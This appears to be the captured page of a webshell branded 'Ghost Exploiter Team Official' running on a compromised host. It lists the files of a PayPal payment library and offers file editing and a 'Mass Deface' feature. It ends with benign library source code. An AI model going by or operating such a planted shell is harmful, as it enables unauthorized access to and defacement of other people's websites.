webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
omnipay
/
paypal
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Message
--
ren
Support
--
ren
ExpressGateway.php
4.527KB
edt
ren
ExpressInContextGateway
...
0.563KB
edt
ren
PayPalItem.php
0.43KB
edt
ren
PayPalItemBag.php
0.59KB
edt
ren
ProGateway.php
1.838KB
edt
ren
RestGateway.php
25.953KB
edt
ren
<?php /** * PayPal Item bag */ namespace Omnipay\PayPal; use Omnipay\Common\ItemBag; use Omnipay\Common\ItemInterface; /** * Class PayPalItemBag * * @package Omnipay\PayPal */ class PayPalItemBag extends ItemBag { /** * Add an item to the bag * * @see Item * * @param ItemInterface|array $item An existing item, or associative array of item parameters */ public function add($item) { if ($item instanceof ItemInterface) { $this->items[] = $item; } else { $this->items[] = new PayPalItem($item); } } }